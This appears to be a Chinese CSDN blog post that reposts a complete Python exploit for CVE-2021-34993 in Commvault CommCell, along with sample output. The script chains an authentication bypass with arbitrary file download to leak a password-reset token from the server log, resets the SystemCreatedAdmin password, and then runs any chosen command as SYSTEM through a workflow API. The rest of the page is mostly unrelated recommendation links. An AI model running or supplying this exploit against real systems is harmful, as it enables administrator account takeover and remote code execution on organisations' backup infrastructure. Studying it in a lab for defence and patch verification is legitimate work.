Commvault CommCell 认证绕过与任意文件下载【CVE-2021-34993】

最新推荐文章于 2023-08-09 13:10:16 发布
最新推荐文章于 2023-08-09 13:10:16 发布
阅读量2k 收藏
点赞数
分类专栏: 代码审计 VulnReviewing 漏洞原理 文章标签: web安全 commvault commcell CVE-2021-34993 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32731075/article/details/121617340
版权

Commvault CommCell 认证绕过与任意文件下载【CVE-2021-34993】

漏洞分析:分析
POC地址:poc
你可能需要个梯子:twitter
POC:

#!/usr/bin/env python3
"""
Commvault Commcell CVAuthHttpModule OnEnter Authentication Bypass Vulnerability
Download: https://downloadcenter.commvault.com/CVDownloadCenter/11.0/build80/Bootstrappers/SP22/CommvaultExpress_Media_11_22.exe?__cv__=1621244407_f429a2139f351674cb6292da156843ea&ext=.exe
Installer: CommvaultExpress_Media_11_22.exe
SHA1(CommvaultExpress_Media_11_22.exe)= a0c3a652fa69f96c2f7e7559b51309034709ac02
Found by: Justin Kennedy, Brandon Perry and Steven Seeley

Bug 1: https://www.zerodayinitiative.com/advisories/ZDI-21-1328/
Bug 2: https://www.zerodayinitiative.com/advisories/ZDI-21-1331/

# Notes

This exploit:

  - ...is a combination of two bugs to achieve authentication bypass
    1. CVAuthHttpModule OnEnter Partial Authentication Bypass
    2. CVSearchSvc downLoadFile File Disclosure

  - ...will reset the SystemCreatedAdmin user accounts password to Sup3rPWD123!! so this is LOUD.
  - ...will trigger an RCE in the Demo_ExecuteProcessOnGroup component, to ensure it achieves SYSTEM access instead of NETWORK SERVICE :->

# Example

researcher@neophyte:~$ ./poc.py
(+) usage: ./poc.py <target> <cmd>
(+) eg: ./poc.py 192.168.184.142 mspaint

researcher@neophyte:~$ ./poc.py 192.168.184.142 mspaint
(+) triggering password reset token for SystemCreatedAdmin...
(+) password reset token logged!
(+) leaking password reset token...
(+) leaked reset token: 3878c9e543ce057c8ad95ace6504e71338f492d488d20e058831469413d5db487740ccd1295da6993374f82c4c9f7a59b
(+) reseting SystemCreatedAdmin's password...
(+) done! reset the password to: U3VwM3JQV0QxMjMhIQ==
(+) logging in...
(+) logged in! obtained encrypted token
(+) triggering rce...
(+) done! executed command: "mspaint" as NT AUTHORITY/SYSTEM
"""

import requests
import sys
import urllib3
import base64
import re
from lxml.etree import fromstring
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def trigger_pwd_reset_token(t):
    uri = "https://%s/webconsole/" % t
    s = requests.Session()
    s.get("%slogin/index.jsp" % uri, verify=False)
    r = s.get("%sTFAStatus.do" % uri, params={"username":"SystemCreatedAdmin"}, verify=False)
    assert r.status_code == 200, "(-) password reset failed during setup!"
    d = {"username":"SystemCreatedAdmin"}
    h = {"X-CSRF-Token": s.cookies['csrf']}
    r = s.post("%sresetPassword.do" % uri, data=d, headers=h, verify=False)
    assert r.status_code == 200, "(-) password reset failed!"
    return s

def leak_reset_token(t):
    uri = "http://%s:81/SearchSvc/CVSearchService.svc" % t
    h = {
        "cookie" : "Login",  # partial auth bypass
        "soapaction" : "http://tempuri.org/ICVSearchSvc/downLoadFile",
        "content-type" : "text/xml"
    }
    d = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:downLoadFile>
         <tem:path>c:/Program Files/Commvault/ContentStore/Log Files/WebServer.log</tem:path>
      </tem:downLoadFile>
   </soapenv:Body>
</soapenv:Envelope>"""
    r = requests.post(uri, data=d, headers=h)
    assert r.status_code == 200, "(-) log leak failed!"
    assert r.headers['content-type'] == "text/xml; charset=utf-8", "(-) invalid xml response from the log leak!"
    xml = fromstring(r.text.encode('utf-8'))
    ns = { "s":"http://schemas.xmlsoap.org/soap/envelope/", "d":"http://tempuri.org/" }
    dfr = xml.xpath('//s:Envelope//s:Body//d:downLoadFileResponse//d:downLoadFileResult', namespaces=ns).pop()
    webserverlog = base64.b64decode(dfr.text.encode('utf-8'))
    matches = re.findall("gid=(.*)", webserverlog.decode("utf-8") )
    assert len(matches) > 0, "(-) no reset token found in the log?"
    r = requests.get("https://%s/webconsole/gtl.do" % t, params={"gid":matches.pop()}, allow_redirects=False, verify=False)
    match = re.search("tk=(.*)", r.headers["location"])
    assert match !=None, "(-) couldn't leak password reset token from 302!"
    return match.group(1)

def reset_password(s, t, tkn, pwd):
    uri = "https://%s/webconsole/resetPasswordReq.do" % t
    d = {
        "password": pwd,
        "token": tkn
    }
    h = {"X-CSRF-Token": s.cookies['csrf']}
    r = s.post(uri, data=d, headers=h, verify=False)
    assert r.status_code == 200, "(-) password reset failed!"

def login(t, pwd):
    uri = "http://%s:81/SearchSvc/CVWebService.svc/Login" % t
    d = """<DM2ContentIndexing_CheckCredentialReq mode="Webconsole" username="SystemCreatedAdmin" password="%s" />""" % pwd
    r = requests.post(uri, data=d)
    assert r.status_code == 200, "(-) login failed!"
    xml = fromstring(r.text.encode('utf-8'))
    ccr = xml.xpath('/DM2ContentIndexing_CheckCredentialResp').pop()
    assert ccr.attrib["token"].startswith("QSDK"), "(-) failed to obtain QSDK token when logging in!"
    return ccr.attrib["token"]

def trigger_workflow(t, qsdk, cmd):
    uri = "https://%s/webconsole/api/Workflow/Demo_ExecuteProcessOnGroup/Action/Execute" % t
    h = {
        "content-type" : "application/json",
        "authtoken" : qsdk
    }
    j = {
        "Workflow_StartWorkflow": {
            "outputFormat": "",
            "options": {
                "inputs": {
                    "clientGroup": "Infrastructure",
                    "processName": cmd, # we are already in the cmd interpreter
                    "arguments": "",
                    "startupPath":"",
                    "impersonateUserName":"",
                    "impersonateUserPassword":"",
                }
            },
            "client": {
                "clientName": ""
            }
        }
    }
    r = requests.post(uri, json=j, headers=h, verify=False)
    assert r.status_code == 200, "(-) rce failed!"

def main():
    if len(sys.argv) != 3:
        print("(+) usage: %s <target> <cmd>" % sys.argv[0])
        print("(+) eg: %s 192.168.184.142 mspaint" % sys.argv[0])
        sys.exit(1)
    t = sys.argv[1]
    c = sys.argv[2]
    pwd = "Sup3rPWD123!!" # change this for whatever you like
    pwd = base64.b64encode(pwd.encode("utf-8")).decode("utf-8")
    print("(+) triggering password reset token for SystemCreatedAdmin...")
    s = trigger_pwd_reset_token(t)
    print("(+) password reset token logged!")
    print("(+) leaking password reset token...")
    token = leak_reset_token(t)
    print("(+) leaked reset token: %s" % token)
    print("(+) reseting SystemCreatedAdmin's password...")
    reset_password(s, t, token, pwd)
    print("(+) done! reset the password to: %s" % pwd)
    print("(+) logging in...")
    qsdk = login(t, pwd)
    print("(+) logged in! obtained encrypted token")
    print("(+) triggering rce...")
    trigger_workflow(t, qsdk, c)
    print("(+) done! executed command: \"%s\" as NT AUTHORITY/SYSTEM" % c)

if __name__ == "__main__":
    main()

当然你想看中文版的这儿有:中文版
这大哥昨天发了这个漏洞,我看了一遍准备搞个靶场试一下,结果他还想让我给他引流…
今天上网一搜还不是翻译的别人国外的文章,差点就给我豁到了…

Iwanturoot
关注
专栏目录
Ubuntu内核OverlayFS权限逃逸漏洞(CVE-2021-3493)
做自己喜欢的事,并将其发挥到极致!
12-06 1309
Linux Kernel 一般指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成,符合POSIX标准的类Unix操作系统。Linux 内核中 overlayfs 文件系统是 Ubuntu 的特定问题,由于没有正确的验证文件系统功能在用户名称空间中的应用,从而导致攻击者可以安装一个允许未授权挂载的 overlayfs 修补程序来提升权限。一些版本存在本地用户提权至root权限。
commvault安装文档
03-12
commvault安装操作手册。声明:不含部署方案
CVE-2021-3493:Linux kernel 特权提升漏洞复现
xiaoxizainiyanli的博客
04-22 394
漏洞介绍 Linux内核中的overlayfs文件系统中的Ubuntu特定问题,其未验证关于用户名称空间的文件系统功能的应用。Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来提权 涉及版本 Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM 环境 learn@learn-virtual-machine:/tmp$ cat /etc/issue Ubuntu
CVE漏洞复现-CVE-2021-3493 Linux 提权内核漏洞
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-09 909
CVE-2021-3493 用户漏洞是 Linux 内核中没有文件系统中的 layfs 中的 Ubuntu over 特定问题,在 Ubuntu 中正确验证有关名称空间文件系统的应用程序。buntu 内核代码允许低权限用户在使用 unshare() 函数创建的用户命名空间中挂载 overlayfs 文件系统。
CommVault-Linux下客户端的安装与卸载完整版资料.ppt
11-14
CommVault-Linux 客户端安装与卸载详细指南 CommVault 是一款数据保护和管理软件,能够对数据进行备份、恢复和存档。下面是 CommVault-Linux 客户端的安装与卸载详细指南: 安装 CommVault-Linux 客户端 1. 挂载...
CommVault安装配置手册-Linux-Unix-文件备份篇.pdf
05-20
CommVault安装配置手册-Linux-Unix-文件备份篇.pdf
CommVault Solution Architect Certification - CVSA认证题库
07-05
CommVault Solution Architect Certification - CVSA 我在线认证考试题时截图,不一定100%,大概70%左右,每次考试题都随机变化,有需要可以参考一下,可省不少时间。
CommVault Technical Sales Professional Accreditation - CVTSP认证题库
07-05
CommVault Technical Sales Professional Accreditation - CVTSP在线考试认证题库,我考试时截的图,不一定100%,大概70%左右,每次考试题都随机变化,请需要可下载参考。
Commvault Complete™ Backup & Recovery v11 SP18 OVF 下载
sysin | SYStem INside
09-12 1122
下载地址 请访问:https://sysin.org/article/DL-Commvault-Complete-Backup-Recovery-11/ Commvault Complete™ Backup & Recovery 一款功能强大的数据保护解决方案–无论您的数据存储在何处 Commvault Complete™ 备份和恢复 无处不在的保护。Commvault Complete™ 备份和恢复是一个强大的数据保护解决方案 – 无论您的数据存储在何处。 开始了解 数据保护技术不断推陈出新 您
CommVault.zip
02-27
Commvaultcommvault对Oracle数据库的备份及恢复文档,本机/异机备份恢复。留言邮箱可私发。
COMMVAULT备份软件操作手册.doc
01-14
commvault备份操作手册,非常详细,可以当参考文档。commvault备份操作手册,非常详细,可以当参考文档。
Commvault数据管理平台V11白皮书.pdf
03-20
Commvault通过为企业提供创新解决方案来满足他们不断变化的数据备份与恢复需求,使得他们能够将数据迁移至云端,
CommVault-项目用户运维操作手册V1.0
07-30
CommVault-项目用户运维操作手册V1.0 慷孚客户端运维手册
CommVault-cv数据备份项目安装配置手册v1.0-demo
07-30
CommVault-cv数据备份项目安装配置手册v1.0-demo 用于描述了慷孚客户端安装配置方法
Commvault资源集合(20191009)
守护数据未来:解密容灾备份策略的艺术
10-09 1054
Commvault官方手册网站: http://docs.commvault.com Commvault KB知识库网站: http://kb.commvault.com/ Commvault硬件兼容性网站: http://docs.commvault.com/tapestoragematrix/ Commvault应用程序、数据库及虚拟化等兼容性(V11SP17): http:/...
COMMVAULT 软件小版本查询
sunrise运维笔记
03-20 691
有几年没摸COMMVAULT 软件备份了,重新使了一下老版本,发现很多都忘了,给客户做ORACLE异机恢复,半天才发现版本小版本号的具体位置,记录一下。貌似V11法一 法二是可以具体的小版本号的。 法一:通过commvault 控制台,以下虽然列出了具体的版本及更新号,但却没有告诉我们小版本是那个。比如: V10 SP。。。。 法二:进程方法,同样没有告诉我们小版本是那个 法三:突然...
commvault服务端升级到2022E版本 自动安装客户端11.28版本 xtrabackup备份与恢复
weixin_55240334的博客
08-22 1083
commvault升级及xtrabackup备份
commvault培训资料
03-08
本课程在CommVault通用技术引擎(CTE)系统管理方面给学员提供了相关的知识和技能,主要包括利用 CommCell控制台界面在用户、任务、客户端、磁带库和介质方面的系统管理。通过相关的测试和实验进一步加强了以下几方面的系统管理能力,如: ***用户管理和安全 ***任务管理 ***客户端和存储策略配置 ***懂得如何恢复和理解恢复选项 ***磁带库和介质管理选项
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值